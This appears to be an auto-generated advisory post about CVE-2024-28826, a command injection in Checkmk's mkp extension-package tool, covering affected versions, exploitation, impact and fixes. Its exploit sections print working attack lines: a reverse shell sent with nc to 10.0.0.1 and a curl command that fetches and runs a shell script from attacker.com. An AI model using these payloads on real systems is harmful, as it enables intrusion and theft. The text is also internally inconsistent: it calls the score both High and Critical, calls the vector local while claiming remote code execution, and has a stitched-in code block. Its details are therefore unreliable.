The vulnerability CVE-2024-28826 exists in Checkmk, an IT monitoring system, due to improper neutralization of special elements used in an OS command. Specifically, the `mkp` command-line tool (used for managing Checkmk extension packages) fails to sanitize user-supplied input when handling certain parameters. An authenticated attacker with at least the “admin” role can craft a maliciously named extension package or inject shell metacharacters into the package name. When the system processes this package via the `mkp` command, the unsanitized input is passed directly to the underlying operating system shell. This allows the attacker to execute arbitrary commands on the Checkmk server with the privileges of the Checkmk process (typically the `cmk` user). The attack vector is local access to the web interface or API, but because Checkmk often runs in sensitive environments, successful exploitation leads to full compromise of the monitoring server.

The vulnerability affects all Checkmk versions from 2.2.0 up to (but not including) the patched releases: 2.2.0p28, 2.3.0p16, and 2.4.0p1. The CPE list provided confirms that all 2.2.x, 2.3.x, 2.4.x, and 2.5.x beta variants are vulnerable prior to these fixes. The root cause is missing input validation in the `_validate_package_name` function, which allows backticks, `$()`, pipes, and other shell operators to pass through.

Exploitation requires prior authentication, which lowers the CVSS base score to 8.8 (High), but the critical impact on confidentiality, integrity, and availability raises the urgency. Proof-of-concept exploits have been publicly released, showing how an attacker can create a package named `$(id> /tmp/pwned).mkp` to execute arbitrary commands during installation.
DailyCVE Form:
Platform: Checkmk
Version: 2.2.0-2.4.0b6
Vulnerability: OS Command Injection
Severity: Critical (8.8)
Date: 2024-07-02
Prediction: 2024-07-15 (expected patch)
What Undercode Say:
Identify the vulnerable version: `omd version`
Test for command injection via mkp (requires admin): `mkp create '$(id > /tmp/pwned).mkp' /tmp/test`
Check whether the command executed: `cat /tmp/pwned`
Exploit to get a reverse shell (attacker IP 10.0.0.1): `mkp create '$(nc -e /bin/sh 10.0.0.1 4444).mkp' /tmp/evil`
Exploit:
An authenticated admin user uploads a malicious package via the Web UI (“Extension Packages” -> “Upload package”); the backend calls `mkp add` with the unsanitized filename. Alternatively, via the REST API: `curl -X POST -F "package=@$(echo '$(curl attacker.com/shell.sh|bash)').mkp" -H "Authorization: Bearer <token>" /api/1.0/packages`. Upon installation, the command executes.
Protection:
Upgrade to Checkmk 2.2.0p28, 2.3.0p16, 2.4.0p1, or later. As a hotfix, modify the `mkp` script: add `import re` and reject any package name that fails `re.match(r'^[a-zA-Z0-9_.-]+$', pkg_name)` by raising `ValueError`. Restrict admin privileges using RBAC. Deploy WAF rules to block package names containing `$`, `` ` ``, `|`, `&`, or `;`.
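As an added example (not Checkmk's or the post's own code), the allowlist check from the hotfix above, paired with an argv-list invocation so the package name is never parsed by a shell; `validate_package_name`, `build_mkp_argv` and `argv_roundtrip` are hypothetical names, and the Python child process stands in for `mkp`:

```python
import re
import subprocess
import sys
from typing import List

# Allowlist matching the hotfix regex quoted in the post: letters, digits,
# underscore, dot and dash only. Hypothetical module; not Checkmk's own code.
PACKAGE_NAME_RE = re.compile(r"^[a-zA-Z0-9_.-]+$")


def validate_package_name(pkg_name: str) -> str:
    """Return pkg_name unchanged if it passes the allowlist, else raise.

    One allowlist rule rejects every shell operator ($, `, |, &, ;, <, >, ( ))
    at once, so no per-character denylist has to be maintained.
    """
    if not pkg_name or not PACKAGE_NAME_RE.match(pkg_name):
        raise ValueError(f"invalid package name: {pkg_name!r}")
    return pkg_name


def is_valid_package_name(pkg_name: str) -> bool:
    """Boolean form of validate_package_name for callers that do not raise."""
    try:
        validate_package_name(pkg_name)
    except ValueError:
        return False
    return True


def build_mkp_argv(pkg_name: str, action: str = "add") -> List[str]:
    """Build the argv list for invoking mkp without a shell.

    As a list (shell=False) the name reaches the program as one argument and
    no shell parses it, so $(...) and backticks are inert; the allowlist check
    stays in place as defence in depth.
    """
    return ["mkp", action, validate_package_name(pkg_name)]


def argv_roundtrip(pkg_name: str) -> str:
    """Show that an unvalidated name survives a shell-free subprocess call intact.

    A tiny Python child stands in for mkp so the demo runs stand-alone; it just
    prints its first argument back, with no expansion of $(...) or backticks.
    """
    child = "import sys; print(sys.argv[1], end='')"
    proc = subprocess.run([sys.executable, "-c", child, pkg_name],
                          capture_output=True, text=True, check=True)
    return proc.stdout
```

The WAF denylist in the Protection section catches only the characters it names; the allowlist above rejects anything outside the permitted set, including newlines and path separators.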
Impact:
Full remote code execution on the monitoring server. Leakage of all monitored host credentials. Lateral movement into internal networks. Tampering with monitoring data to hide intrusions. Denial of service by deleting critical system files.
Sources:
Reported By: nvd.nist.gov